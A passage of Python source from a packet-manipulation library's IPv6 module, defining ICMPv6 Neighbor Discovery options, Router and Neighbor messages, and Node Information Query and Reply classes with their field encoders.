TruncPktLenField(PacketLenField): 1881 def i2m(self, pkt, x): 1882 s = bytes(x) 1883 tmp_len = len(s) 1884 return s[:tmp_len - (tmp_len % 8)] 1885 1886 def i2len(self, pkt, i): 1887 return len(self.i2m(pkt, i)) 1888 1889 1890class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 1891 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 1892 fields_desc = [ByteField("type", 4), 1893 FieldLenField("len", None, length_of="pkt", fmt="B", 1894 adjust=lambda pkt, x: (x + 8) // 8), 1895 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), 1896 TruncPktLenField("pkt", b"", IPv6, 1897 length_from=lambda pkt: 8 * pkt.len - 8)] 1898 1899# See which value should be used for default MTU instead of 1280 1900 1901 1902class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 1903 name = "ICMPv6 Neighbor Discovery Option - MTU" 1904 fields_desc = [ByteField("type", 5), 1905 ByteField("len", 1), 1906 XShortField("res", 0), 1907 IntField("mtu", 1280)] 1908 1909 def mysummary(self): 1910 return self.sprintf("%name% %mtu%") 1911 1912 1913class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 1914 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 1915 fields_desc = [ByteField("type", 6), 1916 ByteField("len", 1), 1917 ByteField("shortcutlim", 40), # XXX 1918 ByteField("res1", 0), 1919 IntField("res2", 0)] 1920 1921 1922class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 1923 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 1924 fields_desc = [ByteField("type", 7), 1925 ByteField("len", 1), 1926 ShortField("res", 0), 1927 IntField("advint", 0)] 1928 1929 def mysummary(self): 1930 return self.sprintf("%name% %advint% milliseconds") 1931 1932 1933class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 1934 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 1935 fields_desc = [ByteField("type", 8), 1936 ByteField("len", 1), 1937 ShortField("res", 0), 1938 ShortField("pref", 0), 1939 ShortField("lifetime", 1)] 1940 1941 def mysummary(self): 1942 return self.sprintf("%name% %pref% %lifetime% seconds") 1943 1944# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 1945 1946# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 1947 1948 1949class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1950 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 1951 fields_desc = [ByteField("type", 17), 1952 ByteField("len", 3), 1953 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 1954 2: "New Care-Of Address", 1955 3: "NAR's IP address"}), 1956 ByteField("plen", 64), 1957 IntField("res", 0), 1958 IP6Field("addr", "::")] 1959 1960 1961class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1962 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 1963 fields_desc = [ByteField("type", 18), 1964 ByteField("len", 3), 1965 ByteField("optcode", 0), 1966 ByteField("plen", 64), 1967 IntField("res", 0), 1968 IP6Field("prefix", "::")] 1969 1970 1971_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1972 1: "LLA for the new AP", 1973 2: "LLA of the MN", 1974 3: "LLA of the NAR", 1975 4: "LLA of the src of TrSolPr or PrRtAdv msg", 1976 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 1977 6: "No preifx info available for AP identified by the LLA", # noqa: E501 1978 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 1979 1980 1981class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1982 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 1983 fields_desc = [ByteField("type", 19), 1984 ByteField("len", 1), 1985 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 1986 MACField("lla", ETHER_ANY)] # We only support ethernet 1987 1988 1989class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 1990 name = "ICMPv6 Neighbor Discovery - MAP Option" 1991 fields_desc = [ByteField("type", 23), 1992 ByteField("len", 3), 1993 BitField("dist", 1, 4), 1994 BitField("pref", 15, 4), # highest availability 1995 BitField("R", 1, 1), 1996 BitField("res", 0, 7), 1997 IntField("validlifetime", 0xffffffff), 1998 IP6Field("addr", "::")] 1999 2000 2001class _IP6PrefixField(IP6Field): 2002 __slots__ = ["length_from"] 2003 2004 def __init__(self, name, default): 2005 IP6Field.__init__(self, name, default) 2006 self.length_from = lambda pkt: 8 * (pkt.len - 1) 2007 2008 def addfield(self, pkt, s, val): 2009 return s + self.i2m(pkt, val) 2010 2011 def getfield(self, pkt, s): 2012 tmp_len = self.length_from(pkt) 2013 p = s[:tmp_len] 2014 if tmp_len < 16: 2015 p += b'\x00' * (16 - tmp_len) 2016 return s[tmp_len:], self.m2i(pkt, p) 2017 2018 def i2len(self, pkt, x): 2019 return len(self.i2m(pkt, x)) 2020 2021 def i2m(self, pkt, x): 2022 tmp_len = pkt.len 2023 2024 if x is None: 2025 x = "::" 2026 if tmp_len is None: 2027 tmp_len = 1 2028 x = inet_pton(socket.AF_INET6, x) 2029 2030 if tmp_len is None: 2031 return x 2032 if tmp_len in [0, 1]: 2033 return b"" 2034 if tmp_len in [2, 3]: 2035 return x[:8 * (tmp_len - 1)] 2036 2037 return x + b'\x00' * 8 * (tmp_len - 3) 2038 2039 2040class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 2041 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 2042 fields_desc = [ByteField("type", 24), 2043 FieldLenField("len", None, length_of="prefix", fmt="B", 2044 adjust=lambda pkt, x: x // 8 + 1), 2045 ByteField("plen", None), 2046 BitField("res1", 0, 3), 2047 BitEnumField("prf", 0, 2, icmp6ndraprefs), 2048 BitField("res2", 0, 3), 2049 IntField("rtlifetime", 0xffffffff), 2050 _IP6PrefixField("prefix", None)] 2051 2052 def mysummary(self): 2053 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 2054 2055 2056class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 2057 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 2058 fields_desc = [ByteField("type", 25), 2059 FieldLenField("len", None, count_of="dns", fmt="B", 2060 adjust=lambda pkt, x: 2 * x + 1), 2061 ShortField("res", None), 2062 IntField("lifetime", 0xffffffff), 2063 IP6ListField("dns", [], 2064 length_from=lambda pkt: 8 * (pkt.len - 1))] 2065 2066 def mysummary(self): 2067 return self.sprintf("%name% ") + ", ".join(self.dns) 2068 2069 2070class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 2071 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 2072 fields_desc = [ByteField("type", 26), 2073 ByteField("len", 1), 2074 BitField("res", 0, 48)] 2075 2076# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 2077# described in section 3.1 of RFC 1035 2078# XXX Label should be at most 63 octets in length : we do not enforce it 2079# Total length of domain should be 255 : we do not enforce it either 2080 2081 2082class DomainNameListField(StrLenField): 2083 __slots__ = ["padded"] 2084 islist = 1 2085 padded_unit = 8 2086 2087 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 2088 self.padded = padded 2089 StrLenField.__init__(self, name, default, length_from=length_from) 2090 2091 def i2len(self, pkt, x): 2092 return len(self.i2m(pkt, x)) 2093 2094 def i2h(self, pkt, x): 2095 if not x: 2096 return [] 2097 return x 2098 2099 def m2i(self, pkt, x): 2100 x = plain_str(x) # Decode bytes to string 2101 res = [] 2102 while x: 2103 # Get a name until \x00 is reached 2104 cur = [] 2105 while x and ord(x[0]) != 0: 2106 tmp_len = ord(x[0]) 2107 cur.append(x[1:tmp_len + 1]) 2108 x = x[tmp_len + 1:] 2109 if self.padded: 2110 # Discard following \x00 in padded mode 2111 if len(cur): 2112 res.append(".".join(cur) + ".") 2113 else: 2114 # Store the current name 2115 res.append(".".join(cur) + ".") 2116 if x and ord(x[0]) == 0: 2117 x = x[1:] 2118 return res 2119 2120 def i2m(self, pkt, x): 2121 def conditionalTrailingDot(z): 2122 if z and orb(z[-1]) == 0: 2123 return z 2124 return z + b'\x00' 2125 # Build the encode names 2126 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 2127 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 2128 2129 # In padded mode, add some \x00 bytes 2130 if self.padded and not len(ret_string) % self.padded_unit == 0: 2131 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 2132 2133 return ret_string 2134 2135 2136class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 2137 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 2138 fields_desc = [ByteField("type", 31), 2139 FieldLenField("len", None, length_of="searchlist", fmt="B", 2140 adjust=lambda pkt, x: 1 + x // 8), 2141 ShortField("res", None), 2142 IntField("lifetime", 0xffffffff), 2143 DomainNameListField("searchlist", [], 2144 length_from=lambda pkt: 8 * pkt.len - 8, 2145 padded=True) 2146 ] 2147 2148 def mysummary(self): 2149 return self.sprintf("%name% ") + ", ".join(self.searchlist) 2150 2151 2152class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 2153 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" 2154 fields_desc = [ByteField("type", 37), 2155 FieldLenField("len", None, length_of="URI", fmt="B", 2156 adjust=lambda pkt, x: (2 + x) // 8), 2157 ICMPv6NDOptDataField("URI", "", strip_zeros=True, 2158 length_from=lambda pkt: 2159 8 * max(pkt.len, 1) - 2)] 2160 2161 def mysummary(self): 2162 return self.sprintf("%name% %URI%") 2163 2164 2165class _PREF64(IP6Field): 2166 def addfield(self, pkt, s, val): 2167 return s + self.i2m(pkt, val)[:12] 2168 2169 def getfield(self, pkt, s): 2170 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) 2171 2172 2173class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 2174 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" 2175 fields_desc = [ByteField("type", 38), 2176 ByteField("len", 2), 2177 BitField("scaledlifetime", 0, 13), 2178 BitEnumField("plc", 0, 3, 2179 ["/96", "/64", "/56", "/48", "/40", "/32"]), 2180 _PREF64("prefix", "::")] 2181 2182 def mysummary(self): 2183 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" 2184 return self.sprintf("%name% %prefix%") + plc 2185 2186# End of ICMPv6 Neighbor Discovery Options. 2187 2188 2189class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 2190 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 2191 fields_desc = [ByteEnumField("type", 133, icmp6types), 2192 ByteField("code", 0), 2193 XShortField("cksum", None), 2194 IntField("res", 0)] 2195 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 2196 2197 2198class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 2199 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 2200 fields_desc = [ByteEnumField("type", 134, icmp6types), 2201 ByteField("code", 0), 2202 XShortField("cksum", None), 2203 ByteField("chlim", 0), 2204 BitField("M", 0, 1), 2205 BitField("O", 0, 1), 2206 BitField("H", 0, 1), 2207 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 2208 BitField("P", 0, 1), 2209 BitField("res", 0, 2), 2210 ShortField("routerlifetime", 1800), 2211 IntField("reachabletime", 0), 2212 IntField("retranstimer", 0)] 2213 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2214 2215 def answers(self, other): 2216 return isinstance(other, ICMPv6ND_RS) 2217 2218 def mysummary(self): 2219 return self.sprintf("%name% Lifetime %routerlifetime% " 2220 "Hop Limit %chlim% Preference %prf% " 2221 "Managed %M% Other %O% Home %H%") 2222 2223 2224class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2225 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 2226 fields_desc = [ByteEnumField("type", 135, icmp6types), 2227 ByteField("code", 0), 2228 XShortField("cksum", None), 2229 IntField("res", 0), 2230 IP6Field("tgt", "::")] 2231 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2232 2233 def mysummary(self): 2234 return self.sprintf("%name% (tgt: %tgt%)") 2235 2236 def hashret(self): 2237 return bytes_encode(self.tgt) + self.payload.hashret() 2238 2239 2240class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2241 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 2242 fields_desc = [ByteEnumField("type", 136, icmp6types), 2243 ByteField("code", 0), 2244 XShortField("cksum", None), 2245 BitField("R", 1, 1), 2246 BitField("S", 0, 1), 2247 BitField("O", 1, 1), 2248 XBitField("res", 0, 29), 2249 IP6Field("tgt", "::")] 2250 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2251 2252 def mysummary(self): 2253 return self.sprintf("%name% (tgt: %tgt%)") 2254 2255 def hashret(self): 2256 return bytes_encode(self.tgt) + self.payload.hashret() 2257 2258 def answers(self, other): 2259 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 2260 2261# associated possible options : target link-layer option, Redirected header 2262 2263 2264class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2265 name = "ICMPv6 Neighbor Discovery - Redirect" 2266 fields_desc = [ByteEnumField("type", 137, icmp6types), 2267 ByteField("code", 0), 2268 XShortField("cksum", None), 2269 XIntField("res", 0), 2270 IP6Field("tgt", "::"), 2271 IP6Field("dst", "::")] 2272 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2273 2274 2275# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 2276 2277class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 2278 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 2279 fields_desc = [ByteField("type", 9), 2280 FieldLenField("len", None, count_of="addrlist", fmt="B", 2281 adjust=lambda pkt, x: 2 * x + 1), 2282 StrFixedLenField("res", b"\x00" * 6, 6), 2283 IP6ListField("addrlist", [], 2284 length_from=lambda pkt: 8 * (pkt.len - 1))] 2285 2286 2287class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 2288 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 2289 type = 10 2290 2291 2292# RFC3122 2293# Options requises : source lladdr et target lladdr 2294# Autres options valides : source address list, MTU 2295# - Comme precise dans le document, il serait bien de prendre l'adresse L2 2296# demandee dans l'option requise target lladdr et l'utiliser au niveau 2297# de l'adresse destination ethernet si aucune adresse n'est precisee 2298# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 2299# les options. 2300# Ether() must use the target lladdr as destination 2301class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 2302 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 2303 fields_desc = [ByteEnumField("type", 141, icmp6types), 2304 ByteField("code", 0), 2305 XShortField("cksum", None), 2306 XIntField("reserved", 0)] 2307 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2308 2309# Options requises : target lladdr, target address list 2310# Autres options valides : MTU 2311 2312 2313class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2314 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 2315 fields_desc = [ByteEnumField("type", 142, icmp6types), 2316 ByteField("code", 0), 2317 XShortField("cksum", None), 2318 XIntField("reserved", 0)] 2319 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 2320 2321 2322############################################################################### 2323# ICMPv6 Node Information Queries (RFC 4620) 2324############################################################################### 2325 2326# [ ] Add automatic destination address computation using computeNIGroupAddr 2327# in IPv6 class (Scapy6 modification when integrated) if : 2328# - it is not provided 2329# - upper layer is ICMPv6NIQueryName() with a valid value 2330# [ ] Try to be liberal in what we accept as internal values for _explicit_ 2331# DNS elements provided by users. Any string should be considered 2332# valid and kept like it has been provided. At the moment, i2repr() will 2333# crash on many inputs 2334# [ ] Do the documentation 2335# [ ] Add regression tests 2336# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 2337# [ ] Check if there are differences between different stacks. Among *BSD, 2338# with others. 2339# [ ] Deal with flags in a consistent way. 2340# [ ] Implement compression in names2dnsrepr() and decompresiion in 2341# dnsrepr2names(). Should be deactivable. 2342 2343icmp6_niqtypes = {0: "NOOP", 2344 2: "Node Name", 2345 3: "IPv6 Address", 2346 4: "IPv4 Address"} 2347 2348 2349class _ICMPv6NIHashret: 2350 def hashret(self): 2351 return bytes_encode(self.nonce) 2352 2353 2354class _ICMPv6NIAnswers: 2355 def answers(self, other): 2356 return self.nonce == other.nonce 2357 2358# Buggy; always returns the same value during a session 2359 2360 2361class NonceField(StrFixedLenField): 2362 def __init__(self, name, default=None): 2363 StrFixedLenField.__init__(self, name, default, 8) 2364 if default is None: 2365 self.default = self.randval() 2366 2367 2368@conf.commands.register 2369def computeNIGroupAddr(name): 2370 """Compute the NI group Address. Can take a FQDN as input parameter""" 2371 name = name.lower().split(".")[0] 2372 record = chr(len(name)) + name 2373 h = md5(record.encode("utf8")) 2374 h = h.digest() 2375 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 2376 return addr 2377 2378 2379# Here is the deal. First, that protocol is a piece of shit. Then, we 2380# provide 4 classes for the different kinds of Requests (one for every 2381# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 2382# data field class that is made to be smart by guessing the specific 2383# type of value provided : 2384# 2385# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 2386# if not overridden by user 2387# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 2388# if not overridden 2389# - Name in the other cases: code is set to 0, if not overridden by user 2390# 2391# Internal storage, is not only the value, but the a pair providing 2392# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 2393# 2394# Note : I merged getfield() and m2i(). m2i() should not be called 2395# directly anyway. Same remark for addfield() and i2m() 2396# 2397# -- arno 2398 2399# "The type of information present in the Data field of a query is 2400# declared by the ICMP Code, whereas the type of information in a 2401# Reply is determined by the Qtype" 2402 2403def names2dnsrepr(x): 2404 """ 2405 Take as input a list of DNS names or a single DNS name 2406 and encode it in DNS format (with possible compression) 2407 If a string that is already a DNS name in DNS format 2408 is passed, it is returned unmodified. Result is a string. 2409 !!! At the moment, compression is not implemented !!! 2410 """ 2411 2412 if isinstance(x, bytes): 2413 if x and x[-1:] == b'\x00': # stupid heuristic 2414 return x 2415 x = [x] 2416 2417 res = [] 2418 for n in x: 2419 termin = b"\x00" 2420 if n.count(b'.') == 0: # single-component gets one more 2421 termin += b'\x00' 2422 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 2423 res.append(n) 2424 return b"".join(res) 2425 2426 2427def dnsrepr2names(x): 2428 """ 2429 Take as input a DNS encoded string (possibly compressed) 2430 and returns a list of DNS names contained in it. 2431 If provided string is already in printable format 2432 (does not end with a null character, a one element list 2433 is returned). Result is a list. 2434 """ 2435 res = [] 2436 cur = b"" 2437 while x: 2438 tmp_len = orb(x[0]) 2439 x = x[1:] 2440 if not tmp_len: 2441 if cur and cur[-1:] == b'.': 2442 cur = cur[:-1] 2443 res.append(cur) 2444 cur = b"" 2445 if x and orb(x[0]) == 0: # single component 2446 x = x[1:] 2447 continue 2448 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 2449 raise Exception("DNS message can't be compressed at this point!") 2450 cur += x[:tmp_len] + b"." 2451 x = x[tmp_len:] 2452 return res 2453 2454 2455class NIQueryDataField(StrField): 2456 def __init__(self, name, default): 2457 StrField.__init__(self, name, default) 2458 2459 def i2h(self, pkt, x): 2460 if x is None: 2461 return x 2462 t, val = x 2463 if t == 1: 2464 val = dnsrepr2names(val)[0] 2465 return val 2466 2467 def h2i(self, pkt, x): 2468 if x is tuple and isinstance(x[0], int): 2469 return x 2470 2471 # Try IPv6 2472 try: 2473 inet_pton(socket.AF_INET6, x.decode()) 2474 return (0, x.decode()) 2475 except Exception: 2476 pass 2477 # Try IPv4 2478 try: 2479 inet_pton(socket.AF_INET, x.decode()) 2480 return (2, x.decode()) 2481 except Exception: 2482 pass 2483 # Try DNS 2484 if x is None: 2485 x = b"" 2486 x = names2dnsrepr(x) 2487 return (1, x) 2488 2489 def i2repr(self, pkt, x): 2490 t, val = x 2491 if t == 1: # DNS Name 2492 # we don't use dnsrepr2names() to deal with 2493 # possible weird data extracted info 2494 res = [] 2495 while val: 2496 tmp_len = orb(val[0]) 2497 val = val[1:] 2498 if tmp_len == 0: 2499 break 2500 res.append(plain_str(val[:tmp_len]) + ".") 2501 val = val[tmp_len:] 2502 tmp = "".join(res) 2503 if tmp and tmp[-1] == '.': 2504 tmp = tmp[:-1] 2505 return tmp 2506 return repr(val) 2507 2508 def getfield(self, pkt, s): 2509 qtype = getattr(pkt, "qtype") 2510 if qtype == 0: # NOOP 2511 return s, (0, b"") 2512 else: 2513 code = getattr(pkt, "code") 2514 if code == 0: # IPv6 Addr 2515 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 2516 elif code == 2: # IPv4 Addr 2517 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 2518 else: # Name or Unknown 2519 return b"", (1, s) 2520 2521 def addfield(self, pkt, s, val): 2522 if ((isinstance(val, tuple) and val[1] is None) or 2523 val is None): 2524 val = (1, b"") 2525 t = val[0] 2526 if t == 1: 2527 return s + val[1] 2528 elif t == 0: 2529 return s + inet_pton(socket.AF_INET6, val[1]) 2530 else: 2531 return s + inet_pton(socket.AF_INET, val[1]) 2532 2533 2534class NIQueryCodeField(ByteEnumField): 2535 def i2m(self, pkt, x): 2536 if x is None: 2537 d = pkt.getfieldval("data") 2538 if d is None: 2539 return 1 2540 elif d[0] == 0: # IPv6 address 2541 return 0 2542 elif d[0] == 1: # Name 2543 return 1 2544 elif d[0] == 2: # IPv4 address 2545 return 2 2546 else: 2547 return 1 2548 return x 2549 2550 2551_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 2552 2553# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 2554# 8: "Link-local addresses", 16: "Site-local addresses", 2555# 32: "Global addresses" } 2556 2557# "This NI type has no defined flags and never has a Data Field". Used 2558# to know if the destination is up and implements NI protocol. 2559 2560 2561class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 2562 name = "ICMPv6 Node Information Query - NOOP Query" 2563 fields_desc = [ByteEnumField("type", 139, icmp6types), 2564 NIQueryCodeField("code", None, _niquery_code), 2565 XShortField("cksum", None), 2566 ShortEnumField("qtype", 0, icmp6_niqtypes), 2567 BitField("unused", 0, 10), 2568 FlagsField("flags", 0, 6, "TACLSG"), 2569 NonceField("nonce", None), 2570 NIQueryDataField("data", None)] 2571 2572 2573class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 2574 name = "ICMPv6 Node Information Query - IPv6 Name Query" 2575 qtype = 2 2576 2577# We ask for the IPv6 address of the peer 2578 2579 2580class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 2581 name = "ICMPv6 Node Information Query - IPv6 Address Query" 2582 qtype = 3 2583 flags = 0x3E 2584 2585 2586class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 2587 name = "ICMPv6 Node Information Query - IPv4 Address Query" 2588 qtype = 4 2589 2590 2591_nireply_code = {0: "Successful Reply", 2592 1: "Response Refusal", 2593 3: "Unknown query type"} 2594 2595_nireply_flags = {1: "Reply set incomplete", 2596 2: "All unicast addresses", 2597 4: "IPv4 addresses", 2598 8: "Link-local addresses", 2599 16: "Site-local addresses", 2600 32: "Global addresses"} 2601 2602# Internal repr is one of those : 2603# (0, "some string") : unknown qtype value are mapped to that one 2604# (3, [ (ttl, ip6), ... ]) 2605# (4, [ (ttl, ip4), ... ]) 2606# (2, [ttl, dns_names]) : dns_names is one string that contains 2607# all the DNS names. Internally it is kept ready to be sent 2608# (undissected). i2repr() decode it for user. This is to 2609# make build after dissection bijective. 2610# 2611# I also merged getfield() and m2i(), and addfield() and i2m(). 2612 2613 2614class NIReplyDataField(StrField): 2615 2616 def i2h(self, pkt, x): 2617 if x is None: 2618 return x 2619 t, val = x 2620 if t == 2: 2621 ttl, dnsnames = val 2622 val = [ttl] + dnsrepr2names(dnsnames) 2623 return val 2624 2625 def h2i(self, pkt, x): 2626 qtype = 0 # We will decode it as string if not 2627 # overridden through 'qtype' in pkt 2628 2629 # No user hint, let's use 'qtype' value for that purpose 2630 if not isinstance(x, tuple): 2631 if pkt is not None: 2632 qtype = pkt.qtype 2633 else: 2634 qtype = x[0] 2635 x = x[1] 2636 2637 # From that point on, x is the value (second element of the tuple) 2638 2639 if qtype == 2: # DNS name 2640 if isinstance(x, (str, bytes)): # listify the string 2641 x = [x] 2642 if isinstance(x, list): 2643 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 2644 if x and isinstance(x[0], int): 2645 ttl = x[0] 2646 names = x[1:] 2647 else: 2648 ttl = 0 2649 names = x 2650 return (2, [ttl, names2dnsrepr(names)]) 2651 2652 elif qtype in [3, 4]: # IPv4 or IPv6 addr 2653 if not isinstance(x, list): 2654 x = [x] # User directly provided an IP, instead of list 2655 2656 def fixvalue(x): 2657 # List elements are not tuples, user probably 2658 # omitted ttl value : we will use 0 instead 2659 if not isinstance(x, tuple): 2660 x = (0, x) 2661 # Decode bytes 2662 if isinstance(x[1], bytes): 2663 x = (x[0], x[1].decode()) 2664 return x 2665 2666 return (qtype, [fixvalue(d) for d in x]) 2667 2668 return (qtype, x) 2669 2670 def addfield(self, pkt, s, val): 2671 t, tmp = val 2672 if tmp is None: 2673 tmp = b"" 2674 if t == 2: 2675 ttl, dnsstr = tmp 2676 return s + struct.pack("!I", ttl) + dnsstr 2677 elif t == 3: 2678 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 2679 elif t == 4: 2680 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 2681 else: 2682 return s + tmp 2683 2684 def getfield(self, pkt, s): 2685 code = getattr(pkt, "code") 2686 if code != 0: 2687 return s, (0, b"") 2688 2689 qtype = getattr(pkt, "qtype") 2690 if qtype == 0: # NOOP 2691 return s, (0, b"") 2692 2693 elif qtype == 2: 2694 if len(s) < 4: 2695 return s, (0, b"") 2696 ttl = struct.unpack("!I", s[:4])[0] 2697 return b"", (2, [ttl, s[4:]]) 2698 2699 elif qtype == 3: # IPv6 addresses with TTLs 2700 # XXX TODO : get the real length 2701 res = [] 2702 while len(s) >= 20: # 4 + 16 2703 ttl = struct.unpack("!I", s[:4])[0] 2704 ip = inet_ntop(socket.AF_INET6, s[4:20]) 2705 res.append((ttl, ip)) 2706 s = s[20:] 2707 return s, (3, res) 2708 2709 elif qtype == 4: # IPv4 addresses with TTLs 2710 # XXX TODO : get the real length 2711 res = [] 2712 while len(s) >= 8: # 4 + 4 2713 ttl = struct.unpack("!I", s[:4])[0] 2714 ip = inet_ntop(socket.AF_INET, s[4:8]) 2715 res.append((ttl, ip)) 2716 s = s[8:] 2717 return s, (4, res) 2718 else: 2719 # XXX TODO : implement me and deal with real length 2720 return b"", (0, s) 2721 2722 def i2repr(self, pkt, x): 2723 if x is None: 2724 return "[]" 2725 2726 if isinstance(x, tuple) and len(x) == 2: 2727 t, val = x 2728 if t == 2: # DNS names 2729 ttl, tmp_len = val 2730 tmp_len = dnsrepr2names(tmp_len) 2731 names_list = (plain_str(name) for name in tmp_len) 2732 return "ttl:%d %s" % (ttl, ",".join(names_list)) 2733 elif t == 3 or t == 4: 2734 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 2735 return repr(val) 2736 return repr(x) # XXX should not happen 2737 2738# By default, sent responses have code set to 0 (successful) 2739 2740 2741class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 2742 name = "ICMPv6 Node Information Reply - NOOP Reply" 2743 fields_desc = [ByteEnumField("type", 140, icmp6types), 2744 ByteEnumField("code", 0, _nireply_code), 2745 XShortField("cksum", None), 2746 ShortEnumField("qtype", 0, icmp6_niqtypes), 2747 BitField("unused", 0, 10), 2748 FlagsField("flags", 0, 6, "TACLSG"), 2749 NonceField("nonce", None), 2750 NIReplyDataField("data", None)] 2751 2752 2753class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 2754 name = "ICMPv6 Node Information Reply - Node Names" 2755 qtype = 2 2756 2757 2758class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 2759 name = "ICMPv6 Node Information Reply - IPv6 addresses" 2760 qtype = 3 2761 2762 2763class 